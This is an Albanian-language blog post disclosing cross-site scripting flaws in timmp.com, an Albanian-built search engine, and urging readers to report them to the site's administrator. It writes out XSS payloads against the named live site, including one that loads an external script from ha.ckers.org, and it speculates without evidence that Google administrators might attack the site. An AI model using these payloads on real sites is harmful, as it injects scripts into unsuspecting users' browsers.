Timmp.com – Motorri i ri i kerkimit (IT’S HACKED UP)

Emmmmm , eshte pak jo e hijshme qe te flas per kete, porse gjithsesi po shkruaj disa gjera…
Me vjen keq qe me bie perhere mua te flas per problemet :(

Ky eshte nje motorr kerkimi i krijuar nga nje shqiptar, dhe kur e mora vesh lajmin u gezova shume, edhe pse ka me shume rezultate se google ,  pra eshte pune goxha serioze dhe eshte krenari per ne qe te bejm gjera te tilla, dhe nga ana tjeter uroj qe te kete sa me shume shqiptar te tille. Rastesisht duke povuar disa terma kerkimi hasa ne nje gabim:

http://www.timmp.com/index.php/search/q/all/el8

Siç e shohim motorri eshte i ndertuar ne php, dhe kjo me beri te mendoja per vulns,
Nuk duhet shume per te arritur ne rendimin e serverit dhe problemeve te tij,

http://www.timmp.com/index.php/search/q/all/%3cimg+src%3d%22jav%26%23×09%3bascript%3aalert(‘ALERT’)%3b%22%3e

Dikush qe une nuk e di sepse u mora me kete pune vetem 5 min, ke perfituar nga ky vulnerabilitet dhe ka hackuar faqen duke arritur te modifikoj edhe query.t e kerkimit.
Per konfirmim, shkoni tek http://www.timmp.com dhe kerkoni me kete kriter kerkimi:

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

Mesazhet qe paraqiten nuk jane shokuese, dikush duhet te mendonte para edhe per sigurine e faqes, faqa ne kete moment eshte e penetruar dhe me sa duket askush nuk eshte shqetesuar.
Te jesh konkurrent sot ne tregun e eger IT, do te thote qe duhet te presesh edhe sulme, qofte edhe nga administratoret e google, kujt do ti pelqente ti iknin miliona vetem se nje 20 vjeçar shkruan nje motorr kerkimi me me shume rezultate se sa vet gogòli?
Ju bej thirrje lexuesve qe te reportojn tek administratori i faqes keto probleme, tek faqa mund te egzekutohen edhe skripte te jashtme qe ndodhen ne faqe te huaja, psh <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> po ta provoni skripti do te egzekutohet ne faqe.
Te gjithe duhet ti çojm email dhe linkoni postimin ne menyre qe te kete me shume sqarime, dhe te besoj vertet qe faqa nuk eshte me e tij.

Tung tung ..

Leave a Reply

Your email address will not be published. Required fields are marked *